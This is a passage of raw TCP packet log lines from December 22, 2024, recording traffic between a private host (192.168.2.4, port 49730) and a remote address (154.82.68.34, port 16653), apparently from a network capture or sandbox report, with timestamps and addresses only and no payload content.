                                      Dec 22, 2024 08:37:04.993853092 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.997085094 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.997138023 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.997215033 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.997272015 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.000469923 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.000530958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.000605106 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.000658035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.003885984 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.003942966 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.004015923 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.004071951 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.007292986 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.007366896 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.007407904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.007463932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.010714054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.010772943 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.010817051 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.010870934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.014065027 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.014125109 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.014163017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.014219046 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.017426968 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.017488003 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.017546892 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.017604113 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.020828962 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.020889997 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.020936966 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.021003962 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.024208069 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.024267912 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.024391890 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.024451017 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.027584076 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.027631044 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.156768084 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.156831980 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.156907082 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.156958103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.158072948 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.158139944 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.158226967 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.158282995 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.160640955 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.160693884 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.160695076 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.160748005 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.163191080 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.163243055 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.163347960 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.163403988 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.165813923 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.165869951 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.165966034 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.166018009 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.168447971 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.168505907 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.168579102 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.168633938 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.171039104 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.171097040 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.171168089 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.171220064 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.173640013 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.173702955 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.173789024 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.173841000 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.176279068 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.176342964 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.176414967 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.176462889 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.178884983 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.178942919 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.178991079 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.179045916 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.181493044 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.181546926 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.181559086 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.181610107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.184123039 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.184190989 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.184231997 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.184284925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.186726093 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.186780930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.186966896 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.187020063 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.189328909 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.189384937 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.189471006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.189523935 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.191946030 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.192001104 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.192075968 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.192126036 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.194566965 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.194618940 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.194705009 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.194755077 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.197204113 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.197267056 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.197463989 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.197527885 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.199839115 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.199919939 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.199996948 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.200050116 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.202421904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.202482939 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.202555895 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.202605963 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.205044031 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.205102921 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.205188990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.205240965 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.207711935 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.207783937 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.207834959 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.207885981 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.210237980 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.210289955 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.210361004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.210423946 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.212882042 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.212948084 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.212990046 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.213041067 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.216017962 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.216070890 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.216156960 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.216207981 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.218377113 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.218439102 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.218483925 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.218535900 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.220733881 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.220793962 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.220829964 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.220880985 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.223352909 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.223411083 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.223500967 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.223720074 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.225933075 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.226003885 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.226046085 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.226099968 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.228544950 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.228611946 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.228702068 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.228760004 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.231200933 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.231264114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.231349945 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.231405020 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.233799934 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.233860016 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.233947992 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.234004974 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.236335039 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.236397028 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.384654045 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.384767056 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.384809017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.384866953 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.385601044 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.385677099 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.386071920 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.386131048 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.386158943 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.386214018 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.388263941 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.388324976 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.388365984 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.388412952 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.390460014 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.390542030 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.390628099 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.390683889 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.392676115 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.392739058 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.392805099 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.392868996 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.394901037 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.394959927 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.395093918 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.395145893 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.397125006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.397176981 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.397227049 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.397279978 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.399334908 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.399391890 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.399451017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.399507046 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.401576042 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.401612043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.401638985 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.401684999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.403810978 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.403867006 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.403907061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.403954029 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.406181097 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.406239986 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.406289101 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.406338930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.408442020 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.408498049 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.408561945 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.408617020 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.410458088 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.410506964 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.410562038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.410612106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.412662983 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.412720919 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.412739038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.412786961 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.414838076 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.414892912 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.414952040 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.415019035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.417087078 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.417146921 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.417243004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.417296886 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.419274092 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.419357061 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.419395924 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.419451952 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.421519995 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.421602964 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.421639919 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.421715975 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.423687935 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.423790932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.423796892 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.423846960 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.426017046 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.426079035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.426083088 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.426136017 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.428112030 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.428165913 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.428177118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.428214073 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.430335045 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.430398941 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.430504084 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.430563927 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.432550907 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.432611942 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.432699919 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.432753086 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.434787035 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.434844971 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.434907913 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.434962034 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.437001944 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.437073946 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.437083006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.437136889 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.439181089 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.439243078 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.439292908 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.439352989 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.441448927 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.441528082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.441548109 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.441605091 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.443620920 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.443707943 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.443734884 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.443789959 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.446027994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.446079016 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.446100950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.446134090 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.448112011 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.448182106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.448230982 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.448287964 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.450278997 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.450345039 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.450475931 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.450664043 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.452539921 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.452609062 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.452682018 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.452742100 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.454720974 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.454782009 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.454824924 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.454888105 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.456929922 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.456989050 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.457005024 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.457055092 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.459120035 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.459180117 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.459240913 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.459299088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.461373091 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.461432934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.461520910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.461571932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.463552952 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.463625908 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.463677883 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.463730097 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.465765953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.465820074 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.465892076 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.465949059 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.468003988 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.468079090 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.468218088 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.468276024 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.470315933 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.470374107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.470426083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.470479012 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.472403049 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.472460032 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.472534895 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.472589970 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.474617004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.474670887 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.474673986 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.474725008 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.476835012 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.476891994 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.476964951 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.477021933 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.479065895 CET1665349730154.82.68.34192.168.2.4
